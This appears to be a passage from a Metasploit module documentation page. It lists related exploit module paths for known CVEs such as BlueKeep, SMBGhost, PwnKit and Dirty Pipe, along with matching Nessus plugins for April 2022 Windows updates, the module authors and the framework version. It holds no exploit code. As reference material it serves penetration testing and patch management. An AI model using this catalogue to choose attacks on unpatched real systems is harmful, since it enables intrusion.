- exploit/windows/fileformat/cve_2017_8464_lnk_rce
- exploit/windows/misc/cve_2022_28381_allmediaserver_bof
- exploit/windows/rdp/cve_2019_0708_bluekeep_rce
- exploit/windows/smb/cve_2020_0796_smbghost
- exploit/linux/http/cve_2019_1663_cisco_rmi_rce
- exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
- exploit/linux/local/cve_2021_3493_overlayfs
- exploit/linux/local/cve_2021_38648_omigod
- exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
- exploit/linux/local/cve_2022_0847_dirtypipe
- exploit/linux/local/cve_2022_0995_watch_queue
- exploit/linux/misc/cve_2020_13160_anydesk
- exploit/linux/misc/cve_2021_38647_omigod
- exploit/multi/http/cve_2021_35464_forgerock_openam
- exploit/multi/sap/cve_2020_6207_solman_rs
Related Nessus plugins:
- KB5012592: Windows 11 Security Update (April 2022)
- KB5012649: Windows Server 2008 R2 Security Update (April 2022)
- KB5012647: Windows 10 version 1809 Security Update (April 2022)
- KB5012666: Windows Server 2012 Security Update (April 2022)
- KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)
- KB5012591: Windows 10 version 1909 / Windows Server 1909 Security Update (April 2022)
- KB5012653: Windows 10 version 1507 LTS Security Update (April 2022)
- KB5012604: Windows Server 2022 Security Update (April 2022)
- KB5012670: Windows Server 2012 R2 Security Update (April 2022)
- KB5012632: Windows Server 2008 Security Update (April 2022)
Authors
- KLINIX5
- Grant Willcox
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.